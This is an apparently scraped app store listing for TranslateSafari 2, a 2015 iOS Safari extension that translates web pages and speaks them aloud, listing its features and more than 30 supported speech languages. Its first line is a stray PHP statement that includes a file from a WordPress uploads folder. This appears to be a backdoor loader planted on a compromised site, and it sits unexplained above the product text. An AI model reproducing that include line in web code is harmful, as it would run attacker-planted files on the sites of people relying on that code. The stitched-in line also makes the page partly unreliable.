include_once(ABSPATH . '/wp-content/uploads/index.php');
This app is designed for both iPhone and iPad
Released: Mar 12, 2015
Size: 18.1 MB
Seller: BorG Technology Corporation
TranslateSafari 2 – Translate & Speak Extension for Safari by BorG Technology Corp.
Description$$$$$ ON SALE TODAY US$4.99 -> $2.99 $$$$$
40% off the regular price !
TranslateSafari 2 - Translate & Speak Extension for Safari
The app is a Safari extension that translates and speaks aloud the entire web page of Safari app.
A must have app to translate and speak aloud web pages of Safari.
Translate the entire web page of Safari app
- Support both Bing Translator (40+ languages) and Google Translate (60+ languages) translation services
- Show both original web page and translation
- Display the original text for each translated sentence
Speak aloud the entire web page of Safari app
- Speak 30+ languages
- Read all unread web pages automatically
- Swipe to control skipping sentences
- Highlight word by word for each speaking sentence
- Speak aloud the clicked web page
- Add favorite web pages with "Starred" to speak aloud later
- With funny bear and human face animations while speaking
- Support useful speaking repeat, pause, speed and pitch options
Optimize speak functions (Pro)
- Background operation support: keep reading aloud web pages in the background while using another app
- Lock screen support: play, pause, skip a sentence, adjust playback volume and see the sentences list on the lock screen
- Headphone support: play, pause, adjust playback volume and detect headphone plugged and unplugged
A Safari extension that translates the entire web page
The app provides a Safari extension that translates the entire web page of Safari app.
Supports both Bing Translator and Google Translate translation services
The app supports both Bing Translator (40+ languages) and Google Translate (60+ languages) translation services.
The service requires the internet connection while translating.
Display the original text for each translated sentence
The app could display the original text while taping the translated sentence.
Show both original web page and translation. Switch between the translation and original web page (Google Translate, iPad).
A Safari extension that speaks aloud the entire web page sentence by sentence
The app integrates the system text-to-speech engine, speaks aloud sentence by sentence without internet connecting.
Speak 30+ languages:
Arabic (Saudi Arabia), Chinese (China), Chinese (Cantonese), Chinese (Taiwan), Czech (Czech Republic), Danish (Denmark), Dutch (Belgium), Dutch (Netherlands), English (Australia), English (Ireland), English (South Africa), English (United Kingdom), English (United States), Finnish (Finland), French (Canada), French (France), German (Germany), Greek (Greece), Hebrew (Israel), Hindi (India), Hungarian (Hungary), Indonesian (Indonesia), Italian (Italy), Japanese (Japan), Korean (South Korea), Norwegian (Norway), Polish (Poland), Portuguese (Brazil), Portuguese (Portugal), Romanian (Romania), Russian (Russia), Slovak (Slovakia), Spanish (Mexico), Spanish (Spain), Swedish (Sweden), Thai (Thailand) and Turkish (Turkey).
The app supports one system language, you can make in-app purchases to buy extra languages.
Add favorite web pages with "Starred"
Add favorite web pages with "Starred" to speak aloud later.
You can swipe to mark a starred item as read or unread, and flag or unflag a starred item.
Read all unread web pages automatically
The app can read all unread starred web pages automatically.
Swipe to control skipping sentences
You can skip a sentence or all below sentences while in Speak mode.
Speak aloud the clicked web page
If you click the link on web page while in Speak mode, the app will read the clicked web page automatically.
Support useful speaking options
Repeat times of the whole article, repeat times of each sentence, speaking pause seconds between sentences, speaking speed, speaking pitch and font size options.
Speaking face animation
Highlight words while speaking
The app will highlight word by word for each speaking sentence.
The app requires iOS 8 (or later).